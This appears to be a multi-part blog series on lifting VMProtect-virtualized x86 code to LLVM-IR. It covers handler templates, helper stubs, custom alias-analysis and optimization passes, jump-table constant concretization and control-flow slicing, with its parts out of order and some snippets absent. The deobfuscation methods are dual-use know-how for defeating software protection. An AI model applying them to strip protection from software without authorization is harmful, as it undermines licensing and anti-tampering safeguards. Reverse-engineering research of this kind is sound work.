The following C++ snippet shows the implementation of a memory load from a generic memory pointer (e.g. SS or DS segments) and from the GS segment:
template <typename T>
__attribute__((always_inline))
void LOAD(size_t &vsp) {
  // Check if it's 'byte' size
  bool isByte = (sizeof(T) == 1);
  // Pop the address
  size_t address = STACK_POP<size_t>(vsp);
  // Load the value
  T value = 0;
  std::memcpy(&value, &RAM[address], sizeof(T));
  // Save the result
  if (isByte) {
    STACK_PUSH<uint16_t>(vsp, ZExt(value));
  } else {
    STACK_PUSH<T>(vsp, value);
  }
}

DEFINE_SEMANTIC_64(LOAD_SS_64) = LOAD<uint64_t>;
DEFINE_SEMANTIC(LOAD_SS_32) = LOAD<uint32_t>;
DEFINE_SEMANTIC(LOAD_SS_16) = LOAD<uint16_t>;
DEFINE_SEMANTIC(LOAD_SS_8) = LOAD<uint8_t>;
DEFINE_SEMANTIC_64(LOAD_DS_64) = LOAD<uint64_t>;
DEFINE_SEMANTIC(LOAD_DS_32) = LOAD<uint32_t>;
DEFINE_SEMANTIC(LOAD_DS_16) = LOAD<uint16_t>;
DEFINE_SEMANTIC(LOAD_DS_8) = LOAD<uint8_t>;

template <typename T>
__attribute__((always_inline))
void LOAD_GS(size_t &vsp) {
  // Check if it's 'byte' size
  bool isByte = (sizeof(T) == 1);
  // Pop the address
  size_t address = STACK_POP<size_t>(vsp);
  // Load the value
  T value = 0;
  std::memcpy(&value, &GS[address], sizeof(T));
  // Save the result
  if (isByte) {
    STACK_PUSH<uint16_t>(vsp, ZExt(value));
  } else {
    STACK_PUSH<T>(vsp, value);
  }
}

DEFINE_SEMANTIC_64(LOAD_GS_64) = LOAD_GS<uint64_t>;
DEFINE_SEMANTIC(LOAD_GS_32) = LOAD_GS<uint32_t>;
DEFINE_SEMANTIC(LOAD_GS_16) = LOAD_GS<uint16_t>;
DEFINE_SEMANTIC(LOAD_GS_8) = LOAD_GS<uint8_t>;
By now the process should be clear. The only difference is the zero-length array being accessed, which ends up as the base of the getelementptr instruction and therefore directly determines the aliasing information LLVM will be able to infer. The same logic applies to all the read and write memory accesses to the different segments.
DEFINE_SEMANTIC
In the code snippets of this section you may have noticed three macros named DEFINE_SEMANTIC_64, DEFINE_SEMANTIC_32 and DEFINE_SEMANTIC. They are the umpteenth trick borrowed from Remill and are meant to generate global variables with unmangled names, pointing to the function definitions of the specialized template handlers. As an example, the ADD semantic definitions for the 8/16/32/64-bit cases are emitted at the LLVM-IR level as unmangled globals (ADD_8, ADD_16, ADD_32, ADD_64) pointing at the corresponding specialized ADD functions.
In the code snippets of this section you may also have noticed the use of a function called UNDEF. It is used to store a fictitious __undef value after each pop from the stack, signalling to LLVM that the popped value is no longer needed.
The __undef value is modeled as a global variable. During the first phase of the optimization pipeline it is used by passes like DSE to kill overlapping post-dominated dead stores; near the end of the pipeline it is replaced with a real undef value, so that the related store instructions are gone from the final optimized LLVM-IR function.
Lifting a basic block
We now have a bunch of templates, structures and helper functions, but how do we actually end up lifting some virtualized code?
The high level idea is the following:
A new LLVM-IR function with the HelperStub signature is generated;
The function’s body is populated with call instructions to the VmHandler helper functions fed with the proper arguments (obtained from the HelperStub parameters);
The optimization pipeline is executed on the function, resulting in the inlining of all the helper functions (that are marked always_inline) and in the propagation of the values;
The updated state of the VmRegisters, VmPassingSlots and stores to the segments is optimized, removing most of the obfuscation patterns used by VMProtect;
The updated state of the virtual stack pointer and virtual instruction pointer is computed.
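The shape of the second step can be sketched with toy stand-ins (the names ToyRAM, PUSH_IMM64, ADD_64 and Toy_HelperStub below are hypothetical, drastically simplified handlers without flags, VmRegisters or a real bytecode decoder):

```cpp
#include <cassert>
#include <cstdint>
#include <cstring>

// Toy stand-ins for the real stack helpers; a flat byte array plays
// the role of the RAM zero-length array.
static uint8_t ToyRAM[0x100];

template <typename T> void STACK_PUSH(size_t &vsp, T v) {
  vsp -= sizeof(T);
  std::memcpy(&ToyRAM[vsp], &v, sizeof(T));
}

template <typename T> T STACK_POP(size_t &vsp) {
  T v;
  std::memcpy(&v, &ToyRAM[vsp], sizeof(T));
  vsp += sizeof(T);
  return v;
}

void PUSH_IMM64(size_t &vsp, uint64_t imm) { STACK_PUSH<uint64_t>(vsp, imm); }

void ADD_64(size_t &vsp) {
  uint64_t a = STACK_POP<uint64_t>(vsp);
  uint64_t b = STACK_POP<uint64_t>(vsp);
  STACK_PUSH<uint64_t>(vsp, a + b);
}

// What a generated HelperStub body conceptually looks like once the VM
// bytecode "push 40; push 2; add" has been translated to handler calls:
// a flat sequence of calls that inlining and value propagation then fold.
uint64_t Toy_HelperStub(size_t vsp) {
  PUSH_IMM64(vsp, 40);
  PUSH_IMM64(vsp, 2);
  ADD_64(vsp);
  return STACK_POP<uint64_t>(vsp);
}
```

After inlining, LLVM's store-to-load propagation collapses such a call sequence into the plain underlying computation, which is exactly the effect the optimization pipeline achieves on the real lifted code.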
A fictitious example of a full pipeline based on the HelperStub function, implemented at the C++ level and optimized to obtain propagated LLVM-IR code follows:
The C++ HelperStub function with calls to the handlers. This only serves as an example, normally the LLVM-IR for this is automatically generated from VM bytecode.
The LLVM-IR of the HelperStub function with inlined and optimized calls to the handlers
The last snippet represents all the semantic computations related to a VmBlock, as described in the high-level overview. However, if the code we lifted captures the whole semantics of a VmStub, we can wrap the HelperStub function with the HelperFunction function, which enforces the liveness properties described in the Liveness and aliasing information section, enabling us to obtain only the computations that update the host execution context:
extern "C" size_t SimpleExample_HelperFunction(
    rptr rax, rptr rbx, rptr rcx, rptr rdx, rptr rsi, rptr rdi,
    rptr rbp, rptr rsp, rptr r8, rptr r9, rptr r10, rptr r11,
    rptr r12, rptr r13, rptr r14, rptr r15, rptr flags,
    size_t KEY_STUB, size_t RET_ADDR, size_t REL_ADDR) {
  // Allocate the temporary virtual registers
  VirtualRegister vmregs[30] = {0};
  // Allocate the temporary passing slots
  size_t slots[30] = {0};
  // Initialize the virtual registers
  size_t vsp = rsp;
  size_t vip = 0;
  // Force the relocation address to 0
  REL_ADDR = 0;
  // Execute the virtualized code
  vip = SimpleExample_HelperStub(
      rax, rbx, rcx, rdx, rsi, rdi, rbp, rsp, r8, r9, r10, r11,
      r12, r13, r14, r15, flags, KEY_STUB, RET_ADDR, REL_ADDR,
      vsp, vip, vmregs, slots);
  // Return the next address(es)
  return vip;
}
The C++ HelperFunction function with the call to the HelperStub function and the relevant stack frame allocations.
The LLVM-IR HelperFunction function with fully optimized code.
It can be seen that the example simply pushes the values of the registers rax and rbx, loads them into vmregs[0] and vmregs[1] respectively, pushes the VmRegisters onto the stack, adds them together, pops the updated flags into vmregs[2], pops the addition's result into vmregs[3], and finally pushes vmregs[3] onto the stack so it can be popped into the rax register at the end. The liveness of the VmRegisters' values ends with the function, hence the updated flags saved in vmregs[2] are not reflected on the host execution context. Looking at the final snippet, we can see that the semantics of the code have been successfully recovered.
What’s next?
In Part 2 we’ll put the described structures and helpers to good use, digging into the details of the virtualized CFG exploration and introducing the basics of the LLVM optimization pipeline.
This post will introduce 7 custom passes that, once added to the optimization pipeline, make the overall LLVM-IR output much more readable. Some words will be spent on the topics of lifting unsupported instructions and recompilation. Finally, the output of 6 devirtualized functions will be shown.
Custom passes
This section will give an overview of some custom passes meant to:
Solve VMProtect specific optimization problems;
Work around limitations of existing LLVM passes, with implementations that wouldn't meet the quality standard of an official LLVM pass.
SegmentsAA
This pass falls under the category of the VMProtect specific optimization problems and is probably the most delicate of the section, as it may feed LLVM with unsafe assumptions. The aliasing information described in the Liveness and aliasing information section finally comes in handy here. The goal of the pass is to identify the types of two pointers and determine whether they can be deemed as not aliasing each other.
With the structures defined in the previous sections, LLVM is already able to infer that two pointers derived from the following sources don’t alias with one another:
general purpose registers
VmRegisters
VmPassingSlots
GS zero-sized array
FS zero-sized array
RAM zero-sized array (with constant index)
RAM zero-sized array (with symbolic index)
Additionally, LLVM can discern between pointers with a RAM base using a simple symbolic index. For example, an access to [rsp - 0x10] (local stack slot) will be considered NoAlias when compared with an access to [rsp + 0x10] (incoming stack argument).
But LLVM's alias analysis passes fall short when handling pointers that use the RAM array as base together with a more convoluted symbolic index. The reason for the shortcoming is entirely the lack of type and context information, which was lost during compilation to binary.
The pass is inspired by existing implementations (1, 2, 3) that are basing their checks on the identification of pointers belonging to different segments and address spaces.
Slicing the symbolic index used in a RAM array access we can discern with high confidence between the following additional NoAlias memory accesses:
indirect access: if the access is a stack argument ([rsp] or [rsp + positive_constant_offset + symbolic_offset]), a dereferenced general purpose register ([rax]) or a nested dereference (val1 = [rax], val2 = [val1]); identified as TyIND in the code;
local stack slot: if the access is of the form [rsp - positive_constant_offset + symbolic_offset]; identified as TySS in the code;
local stack array: if the access is of the form [rsp - positive_constant_offset + phi_index]; identified as TyARR in the code.
If the pointer type cannot be reliably detected, an unknown type (identified as TyUNK in the code) is being used, and the comparison between the pointers is automatically skipped. If the pass cannot return a NoAlias result, the query is passed back to the default alias analysis pipeline.
One could argue that the pass is not really needed, as it is unlikely that the propagation of the sensitive information we need to successfully explore the virtualized CFG is hindered by aliasing issues. In fact, the computation of a conditional branch at the end of a VmBlock is guaranteed not to be hindered by a symbolic memory store happening before the jump VmHandler accesses the branch destination. But there are cases where VMProtect pushes the address of the next VmStub in one of the first VmBlocks, performs memory stores in between, and accesses the pushed value only in one or more VmExits. In such cases, discerning between a local stack slot and an indirect access enables the propagation of the pushed address.
Regardless of the aforementioned issue, which can be solved with some ad-hoc store-to-load detection logic, playing with the alias analysis information fed to LLVM can make the devirtualized code more readable. We have to keep in mind that there may be edge cases where the original code breaks our assumptions, so having at least a vague idea of the pointers accessed at runtime can give us more confidence, or force us to err on the safe side and rely solely on the built-in LLVM alias analysis passes.
The assembly snippet shown below has been devirtualized with and without adding the SegmentsAA pass to the pipeline. If we are sure that at runtime, before the push rax instruction, rcx doesn’t contain the value rsp - 8 (extremely unexpected on benign code), we can safely enable the SegmentsAA pass and obtain a cleaner output.
The devirtualized code without the SegmentsAA pass added to the pipeline and therefore no assumptions fed to LLVM
Alias analysis is a complex topic, and experience taught me that most of the propagation issues encountered while using LLVM to deobfuscate code are related to LLVM's alias analysis passes being hindered by some pointer computation. Therefore, having the capability to feed LLVM with context-aware information may be the only way to handle certain types of obfuscation. Beware that other tools you are used to are most likely making similar "safe" assumptions under the hood (e.g. concolic execution tools using the concrete pointer to answer aliasing queries).
The takeaway from this section is that, if needed, you can define your own alias analysis callback pass to be integrated in the optimization pipeline in such a way that pre-existing passes can make use of the refined aliasing query results. This is similar to updating IDA’s stack variables with proper type definitions to improve the propagation results.
KnownIndexSelect
This pass falls under the category of the VMProtect specific optimization problems. In fact, whoever has looked into VMProtect 3.0.9 knows that the following trick, reimplemented as high-level C code for simplicity, is used internally to select between the two branches of a conditional jump.
uint64_t ConditionalBranchLogic(uint64_t RFLAGS) {
  // Extracting the ZF flag bit
  uint64_t ConditionBit = (RFLAGS & 0x40) >> 6;
  // Writing the jump destinations
  uint64_t Stack[2] = {0};
  Stack[0] = 5369966919;
  Stack[1] = 5369966790;
  // Selecting the correct jump destination
  return Stack[ConditionBit];
}
What is really happening at the low level is that the branch destinations are written to adjacent stack slots, and then a conditional load, controlled by the previously computed flags, selects one slot or the other to fetch the right jump destination.
LLVM doesn't automatically see through the conditional load, but it provides us with all the information needed to write such an optimization ourselves. In fact, the ValueTracking analysis exposes the computeKnownBits function that we can use to determine if the index used in a getelementptr instruction is bound to have just two values.
At this point we can generate two separate load instructions accessing the stack slots with the inferred indices and feed them to a select instruction controlled by the index itself. At the next store-to-load propagation, LLVM will happily identify the matching store and load instructions, propagating the constants representing the conditional branch destinations and generating a nice select instruction with constant second and third operands.
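In C-like terms, the effect of the rewrite can be sketched as follows (illustrative only; BranchViaLoad mirrors the ConditionalBranchLogic snippet above, and BranchViaSelect is the shape the code takes after the two loads are materialized, fed to a select, and folded by store-to-load propagation):

```cpp
#include <cassert>
#include <cstdint>

// Before: a conditional load through an index known to be 0 or 1.
uint64_t BranchViaLoad(uint64_t RFLAGS) {
  uint64_t ConditionBit = (RFLAGS & 0x40) >> 6;
  uint64_t Stack[2] = {0};
  Stack[0] = 5369966919ULL;
  Stack[1] = 5369966790ULL;
  return Stack[ConditionBit];
}

// After: the two possible loads are made explicit and driven by a select;
// constant propagation then folds them into the two branch destinations.
uint64_t BranchViaSelect(uint64_t RFLAGS) {
  uint64_t ConditionBit = (RFLAGS & 0x40) >> 6;
  return ConditionBit ? 5369966790ULL : 5369966919ULL;
}
```

The second form is what makes the two outgoing edges of the conditional branch directly visible to the rest of the pipeline.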
The snippet above shows the matched pattern, its exploded form suitable for the LLVM propagation and its final optimized shape. In this case the ValueTracking analysis provided the values 0 and 8 as the only feasible ones for the %index value.
A brief discussion about this pass can be found in this chain of messages in the LLVM mailing list.
SynthesizeFlags
This pass falls in between the categories of the VMProtect specific optimization problems and LLVM optimization limitations. In fact, this pass is based on the enumerative synthesis logic implemented by Souper, with some minor tweaks to make it more performant for our use-case.
This pass exists because I’m lazy and the fewer ad-hoc patterns I write, the happier I am. The patterns we are talking about are the ones generated by the flag manipulations that VMProtect does when computing the condition for a conditional branch. LLVM already does a good job with simplifying part of the patterns, but to obtain mint-like results we absolutely need to help it a bit.
There’s not much to say about this pass, it is basically invoking Souper’s enumerative synthesis with a selected set of components (Inst::CtPop, Inst::Eq, Inst::Ne, Inst::Ult, Inst::Slt, Inst::Ule, Inst::Sle, Inst::SAddO, Inst::UAddO, Inst::SSubO, Inst::USubO, Inst::SMulO, Inst::UMulO), requiring the synthesis of a single instruction, enabling the data-flow pruning option and bounding the LHS candidates to a maximum of 50. Additionally the pass is executing the synthesis only on the i1 conditions used by the select and br instructions.
This Godbolt page shows the devirtualized LLVM-IR output obtained appending the SynthesizeFlags pass to the pipeline and the resulting assembly with the properly recompiled conditional jumps. The original assembly code can be seen below. It’s a dummy sequence of instructions where the key piece is the comparison between the rax and rbx registers that drives the conditional branch jcc.
MemoryCoalescing
This pass falls under the category of generic LLVM optimization passes that couldn't be included in the mainline framework because they wouldn't match the quality criteria of a stable pass. That said, the transformations done by this pass are applicable to generic LLVM-IR code, even if the handled cases are most likely to be found in obfuscated code.
Passes like DSE already attempt to handle the case where a store instruction partially or completely overlaps with other store instructions. However, the more convoluted case of multiple stores contributing to the value of a single memory slot is only partially handled.
This pass is focusing on the handling of the case illustrated in the following snippet, where multiple smaller stores contribute to the creation of a bigger value subsequently accessed by a single load instruction.
Now, you can arm yourself with patience and manually match all the store and load operations, or you can trust me when I tell you that all of them contribute to the creation of a single i64 value that is finally saved in the rax register.
The pass works at the intra-block level and relies on the analysis results provided by the MemorySSA, ScalarEvolution and AAResults interfaces to walk backward the definition chains contributing to the value fetched by each load instruction in the block. While doing so, it fills a structure keeping track of the aliasing store instructions, the stored values, and the offsets and sizes overlapping the memory slot fetched by each load. If a sequence of store assignments completely defining the value of the whole memory slot is found, the chain is processed to remove the store-to-load indirection. Subsequent passes may then rely on this new indirection-free chain to apply more transformations. As an example, the previous LLVM-IR snippet turns into the following optimized LLVM-IR snippet when the MemoryCoalescing pass is applied before executing the InstCombine pass. Nice huh?
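The pattern the pass targets can be reproduced in plain C++ (a hypothetical, simplified stand-in for the RAM accesses; little-endian layout assumed):

```cpp
#include <cassert>
#include <cstdint>
#include <cstring>

// Before: eight 8-bit stores build a 64-bit value that a single load fetches.
// The pass proves the byte stores fully cover the loaded slot and forwards
// the composed value, removing the store-to-load indirection.
uint64_t ComposeViaMemory() {
  uint8_t slot[8];
  for (int i = 0; i < 8; ++i)
    slot[i] = static_cast<uint8_t>(i + 1);  // bytes 0x01 .. 0x08
  uint64_t value;
  std::memcpy(&value, slot, sizeof(value));
  return value;
}

// After: the coalesced, indirection-free equivalent (little-endian),
// built purely out of shifts and ors that InstCombine can fold further.
uint64_t ComposeDirectly() {
  uint64_t value = 0;
  for (int i = 0; i < 8; ++i)
    value |= static_cast<uint64_t>(i + 1) << (8 * i);
  return value;
}
```

Both functions compute the same value on a little-endian host; the second form is the one later passes can actually reason about.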
PartialOverlapDSE
This pass also falls under the category of generic LLVM optimization passes that couldn't be included in the mainline framework because they wouldn't match the quality criteria of a stable pass. Again, the transformations done by this pass are applicable to generic LLVM-IR code, even if the handled cases are most likely to be found in obfuscated code.
Conceptually similar to the MemoryCoalescing pass, the goal of this pass is to sweep a function to identify chains of store instructions that post-dominate a single store instruction and kill its value before it is actually being fetched. Passes like DSE are doing a similar job, although limited to some forms of full overlapping caused by multiple stores on a single post-dominated store.
Applying the -O3 pipeline to the following example won't remove the first 64-bit dead store at RAM[%0], even though the subsequent 64-bit stores at RAM[%0 - 4] and RAM[%0 + 4] fully overlap it, redefining its value.
Adding the PartialOverlapDSE pass to the pipeline will identify and kill the first store, enabling other passes to eventually kill the chain of computations contributing to the stored value. The built-in DSE pass most likely doesn't perform such a kill because collecting information about multiple overlapping stores is an expensive operation.
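The overlap pattern can be illustrated in plain C++ (a hypothetical stand-in: an arena plays the role of RAM, and p corresponds to the %0 pointer; little-endian layout assumed in the test):

```cpp
#include <cassert>
#include <cstdint>
#include <cstring>

// The first 8-byte store at p is fully redefined by the later stores at
// p - 4 and p + 4, so it is dead even though neither later store alone
// fully overlaps it. This is exactly the case built-in DSE misses.
uint64_t OverlappingStores() {
  uint8_t arena[16] = {0};
  uint8_t *p = arena + 4;
  uint64_t dead = 0x1111111111111111ULL;
  std::memcpy(p, &dead, 8);        // dead store: covers bytes [4, 12)
  uint64_t lo = 0x2222222222222222ULL;
  std::memcpy(p - 4, &lo, 8);      // redefines bytes [0, 8)
  uint64_t hi = 0x3333333333333333ULL;
  std::memcpy(p + 4, &hi, 8);      // redefines bytes [8, 16)
  uint64_t result;
  std::memcpy(&result, p, 8);      // reads bytes [4, 12): no 0x11 survives
  return result;
}
```

Since the final load observes no byte of the first store, killing it (and the computation feeding it) is safe, which is precisely what PartialOverlapDSE enables.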
PointersHoisting
This pass is strictly related to the IsGuaranteedLoopInvariant patch I submitted; in fact, it simply identifies all the pointers that can be safely hoisted to the entry block because they depend solely on values coming directly from the entry block. Applying this kind of transformation prior to the execution of the DSE pass may lead to better optimization results.
As an example, consider this devirtualized function containing a rather useless switch case. I’m saying rather useless because each store in the case blocks is post-dominated and killed by the store i32 22, i32* %85 instruction, but LLVM is not going to kill those stores until we move the pointer computation to the entry block.
When the PointersHoisting pass is applied before executing the DSE pass we obtain the following code, where the switch case has been completely removed because it has been deemed dead.
ConstantConcretization
This pass falls under the category of generic LLVM optimization passes that are useful when dealing with obfuscated code, but basically useless, at least in their current shape, in a standard compilation pipeline. In fact, it's not uncommon to find obfuscated code relying on constants stored in data sections added during the protection phase.
As an example, on some versions of VMProtect, when the Ultra mode is used, the conditional branch computations involve dummy constants fetched from a data section. Or if we think about a virtualized jump table (e.g. generated by a switch in the original binary), we also have to deal with a set of constants fetched from a data section.
Hence the reason for having a custom pass that, during the execution of the pipeline, identifies potential constant data accesses and converts the associated memory load into an LLVM constant (or chain of constants). This process can be referred to as constant(s) concretization.
The pass is going to identify all the load memory accesses in the function and determine if they fall in the following categories:
A constantexpr memory load that is using an address contained in one of the binary sections; this case is what you would hit when dealing with some kind of data-based obfuscation;
A symbolic memory load that is using as base an address contained in one of the binary sections and as index an expression that is constrained to a limited amount of values; this case is what you would hit when dealing with a jump table.
In both cases the user needs to provide a safe set of memory ranges that the pass can consider as read-only, otherwise the pass will restrict the concretization to addresses falling in read-only sections in the binary.
In the first case, the address is directly available and the associated value can be resolved by simply parsing the binary.
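This first case can be sketched in a few lines of C++ (hypothetical names: the Section struct and ConcretizeLoad32 helper are illustrative, not the tool's actual API; little-endian layout assumed):

```cpp
#include <cassert>
#include <cstdint>
#include <cstring>
#include <optional>
#include <vector>

// A minimal model of a mapped binary section.
struct Section {
  uint64_t base;
  std::vector<uint8_t> bytes;
  bool readOnly;
};

// If `address` falls inside a read-only section, return the 32-bit
// constant stored there so the memory load can be concretized.
std::optional<uint32_t> ConcretizeLoad32(const std::vector<Section> &sections,
                                         uint64_t address) {
  for (const auto &sec : sections) {
    if (!sec.readOnly)
      continue;
    if (address >= sec.base && address + 4 <= sec.base + sec.bytes.size()) {
      uint32_t value;
      std::memcpy(&value, &sec.bytes[address - sec.base], 4);
      return value;
    }
  }
  return std::nullopt;  // not provably constant: leave the load alone
}
```

The read-only restriction mirrors the safety requirement described above: without it, the pass could bake in a value that the program later overwrites.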
In the second case, the expression computing the symbolic memory access is sliced, the constraint(s) coming from the predecessor block(s) are harvested, and Souper is queried in an incremental way (conceptually similar to the one used while solving the outgoing edges of a VmBlock) to obtain the set of addresses accessing the binary. Each address is then verified to really lie in a binary section, and the corresponding value is fetched. At this point we have a unique mapping between each address and its value, which we can turn into a selection cascade, illustrated in the following LLVM-IR snippet:
; Fetching the switch control value from [rsp + 40]
%2 = add i64 %rsp, 40
%3 = getelementptr inbounds [0 x i8], [0 x i8]* @RAM, i64 0, i64 %2
%4 = bitcast i8* %3 to i32*
%72 = load i32, i32* %4, align 1
; Computing the symbolic address
%84 = zext i32 %72 to i64
%85 = shl nuw nsw i64 %84, 1
%86 = and i64 %85, 4294967296
%87 = sub nsw i64 %84, %86
%88 = shl nsw i64 %87, 2
%89 = add nsw i64 %88, 5368964976
; Generated selection cascade
%90 = icmp eq i64 %89, 5368964988
%91 = icmp eq i64 %89, 5368964980
%92 = icmp eq i64 %89, 5368964984
%93 = icmp eq i64 %89, 5368964992
%94 = icmp eq i64 %89, 5368964996
%95 = select i1 %90, i64 2442748, i64 1465288
%96 = select i1 %91, i64 650651, i64 %95
%97 = select i1 %92, i64 2740242, i64 %96
%98 = select i1 %93, i64 1706770, i64 %97
%99 = select i1 %94, i64 1510355, i64 %98
The %99 value will hold the proper constant based on the address computed by the %89 value. The example above represents the lifted jump table shown in the next snippet, where you can notice the jump table base 0x14003E770 (5368964976) and the corresponding addresses and values:
If we take a peek at the sliced jump condition implementing the virtualized switch case (below), this is how it looks after the ConstantConcretization pass has been scheduled in the pipeline and further InstCombine executions have updated the selection cascade to compute the switch case addresses. Souper will therefore be able to identify the 6 possible outgoing edges, leading to the devirtualized switch case presented in the PointersHoisting section:
; Fetching the switch control value from [rsp + 40]
%2 = add i64 %rsp, 40
%3 = getelementptr inbounds [0 x i8], [0 x i8]* @RAM, i64 0, i64 %2
%4 = bitcast i8* %3 to i32*
%72 = load i32, i32* %4, align 1
; Computing the symbolic address
%84 = zext i32 %72 to i64
%85 = shl nuw nsw i64 %84, 1
%86 = and i64 %85, 4294967296
%87 = sub nsw i64 %84, %86
%88 = shl nsw i64 %87, 2
%89 = add nsw i64 %88, 5368964976
; Generated selection cascade
%90 = icmp eq i64 %89, 5368964988
%91 = icmp eq i64 %89, 5368964980
%92 = icmp eq i64 %89, 5368964984
%93 = icmp eq i64 %89, 5368964992
%94 = icmp eq i64 %89, 5368964996
%95 = select i1 %90, i64 5371151872, i64 5370415894
%96 = select i1 %91, i64 5369359775, i64 %95
%97 = select i1 %92, i64 5371449366, i64 %96
%98 = select i1 %93, i64 5370174412, i64 %97
%99 = select i1 %94, i64 5370219479, i64 %98
%100 = call i64 @HelperKeepPC(i64 %99) #15
Unsupported instructions
It is well known that all the virtualization-based protectors support only a subset of the targeted ISA. Thus, when an unsupported instruction is found, an exit from the virtual machine is executed (context switching to the host code), running the unsupported instruction(s) and re-entering the virtual machine (context switching back to the virtualized code).
The UnsupportedInstructionsLiftingToLLVM proof-of-concept is an attempt to lift the unsupported instructions to LLVM-IR, generating an InlineAsm instruction configured with the set of clobbering constraints and (ex|im)plicitly accessed registers. An execution context structure representing the general purpose registers is employed during the lifting to feed the inline assembly call instruction with the loaded registers, and to store the updated registers after the inline assembly execution.
This approach guarantees a smooth connection between two virtualized VmStubs and an intermediate sequence of unsupported instructions, enabling some of the LLVM optimizations and better register allocation during the recompilation phase.
An example of the lifted unsupported instruction rdtsc follows:
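The original listing appears to have been lost here; the following is a hedged reconstruction of what such a lifting could look like, based on the description above. The %ctx pointer, the %ContextTy structure, its field indices and the exact constraint string are our assumptions, not taken from the post:

```llvm
; Sketch only: rdtsc lifted through an InlineAsm call. The registers are
; loaded from / stored to an execution context structure (%ctx), so the
; surrounding LLVM-IR stays connected to the virtualized code around it.
%rax_ptr = getelementptr inbounds %ContextTy, %ContextTy* %ctx, i32 0, i32 0
%rdx_ptr = getelementptr inbounds %ContextTy, %ContextTy* %ctx, i32 0, i32 3
%pair = call { i64, i64 } asm sideeffect "rdtsc",
        "={ax},={dx},~{dirflag},~{fpsr},~{flags}"()
%lo = extractvalue { i64, i64 } %pair, 0
%hi = extractvalue { i64, i64 } %pair, 1
; Store the updated registers back into the execution context
store i64 %lo, i64* %rax_ptr
store i64 %hi, i64* %rdx_ptr
```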
I haven’t really explored the recompilation in depth so far, because my main objective was to obtain readable LLVM-IR code, but some considerations follow:
If the goal is being able to execute, and eventually decompile, the recovered code, then compiling the devirtualized function using the layer of indirection offered by the general purpose register pointers is a valid way to do so. It is conceptually similar to the kind of indirection used by Remill with its own State structure. SATURN employs this technique when the stack slots and arguments recovery cannot be applied.
If the goal is to achieve a 1:1 register allocation, then things get more complicated, because one can’t simply map all the general purpose register pointers to the hardware registers and hope that no side effects manifest.
The major issue to deal with when attempting a 1:1 mapping is related to how the recompilation may unexpectedly change the stack layout. This could happen if, during the register allocation phase, some spilling slot is allocated on the stack. If these additional spilling+reloading semantics are not adequately handled, some pointers used by the function may access unforeseen stack slots with disastrous results.
Results showcase
The following log files contain the output of the PoC tool executed on functions showcasing different code constructs (e.g. loop, jump table) and accessing different data structures (e.g. GS segment, DS segment, KUSER_SHARED_DATA structure):
0x140001d10@DevirtualizeMe1: calling KERNEL32.dll::GetTickCount64 and literally included as nostalgia kicked in;
0x140001e60@DevirtualizeMe2: executing an unsupported cpuid and with some nicely recovered llvm.fshl.i64 intrinsic calls used as rotations;
0x140001d20@DevirtualizeMe2: calling ADVAPI32.dll::GetUserNameW and with a nicely recovered llvm.bswap.i64 intrinsic call;
0x13001334@EMP: DllEntryPoint, calling another internal function (intra-call);
0x1301d000@EMP: calling KERNEL32.dll::LoadLibraryA, KERNEL32.dll::GetProcAddress, calling other internal functions (intra-calls), executing several unsupported cpuid instructions;
0x130209c0@EMP: accessing KUSER_SHARED_DATA and with nicely synthesized conditional jumps;
0x1400044c0@Switches64: executing the CPUID handler and devirtualized with PointersHoisting disabled to preserve the switch case.
Searching for the @F_ pattern in your favourite text editor will bring you directly to each devirtualized VmStub, immediately preceded by the textual representation of the recovered CFG.
Afterword
I apologize for the length of the series, but I didn’t want to discard bits of information that could possibly help others approaching LLVM as a deobfuscation framework, especially knowing that, at this time, several parties are currently working on their own LLVM-based solution. I felt like showcasing its effectiveness and limitations on a well-known obfuscator was a valid way to dive through most of the details. Please note that the process described in the posts is just one of the many possible ways to approach the problem, and by no means the best way.
The source code of the proof-of-concept should be considered an experimentation playground, with everything that involves (e.g. bugs, unhandled edge cases, non production-ready quality). As a matter of fact, some of the components are barely sketched to let me focus on improving the LLVM optimization pipeline. In the future I’ll try to find the time to polish most of it, but in the meantime I hope it can at least serve as a reference to better understand the explained concepts.
Feel free to reach out with doubts, questions or even flaws you may have found in the process, I’ll be more than happy to allocate some time to discuss them.
I’d like to thank:
Peter, for introducing me to LLVM and working on SATURN together.
mrexodia and mrphrazer, for the in-depth review of the posts.
justmusjle, for enhancing the colors used by the diagrams.
Secret Club, for their suggestions and series hosting.
This post will introduce the concepts of expression slicing and partial CFG, combining them to implement an SMT-driven algorithm to explore the virtualized CFG. Finally, some words will be spent on introducing the LLVM optimization pipeline, its configuration and its limitations.
Poor man’s slicer
Slicing a symbolic expression to be able to evaluate it, throw it at an SMT solver or match it against some pattern is something extremely common in all symbolic reasoning tools. Luckily for us this capability is trivial to implement with yet another C++ helper function. This technique has been referred to as Poor man’s slicer in the SATURN paper, hence the title of the section.
In the VMProtect context we are mainly interested in slicing one expression: the next program counter. We want to do that either while exploring the single VmBlocks (that, once connected, form a VmStub) or while exploring the VmStubs (that, once connected, form a VmFunction). The following C++ code is meant to keep only the computations related to the final value of the virtual instruction pointer at the end of a VmBlock or VmStub:
extern "C" size_t HelperSlicePC(
  size_t rax, size_t rbx, size_t rcx, size_t rdx, size_t rsi,
  size_t rdi, size_t rbp, size_t rsp, size_t r8, size_t r9,
  size_t r10, size_t r11, size_t r12, size_t r13, size_t r14,
  size_t r15, size_t flags,
  size_t KEY_STUB, size_t RET_ADDR, size_t REL_ADDR)
{
  // Allocate the temporary virtual registers
  VirtualRegister vmregs[30] = {0};
  // Allocate the temporary passing slots
  size_t slots[30] = {0};
  // Initialize the virtual registers
  size_t vsp = rsp;
  size_t vip = 0;
  // Force the relocation address to 0
  REL_ADDR = 0;
  // Execute the virtualized code
  vip = HelperStub(rax, rbx, rcx, rdx, rsi, rdi, rbp, rsp,
    r8, r9, r10, r11, r12, r13, r14, r15, flags,
    KEY_STUB, RET_ADDR, REL_ADDR, vsp, vip, vmregs, slots);
  // Return the sliced program counter
  return vip;
}
The acute observer will notice that the function definition is basically identical to the HelperFunction definition given before, with the fundamental difference that the arguments are passed by value. They are therefore usable in the computation of the sliced expression, but their liveness scope ends at the end of the function, which guarantees that there won’t be store operations to the host context that could bloat the code.
The steps to use the above helper function are:
The HelperSlicePC is cloned into a new throwaway function;
The call to the HelperStub function is swapped with a call to the VmBlock or VmStub of which we want to slice the final instruction pointer;
The called function is forcefully inlined into the HelperSlicePC function;
The optimization pipeline is executed on the cloned HelperSlicePC function resulting in the slicing of the final instruction pointer expression as a side-effect of the optimizations.
The following LLVM-IR snippet shows the idea in action, resulting in the final optimized function where the condition and edges of the conditional branch are clearly visible.
In the following section we’ll see how variations of this technique are used to explore the virtualized control flow graph, solve the conditional branches, and recover the switch cases.
Exploration
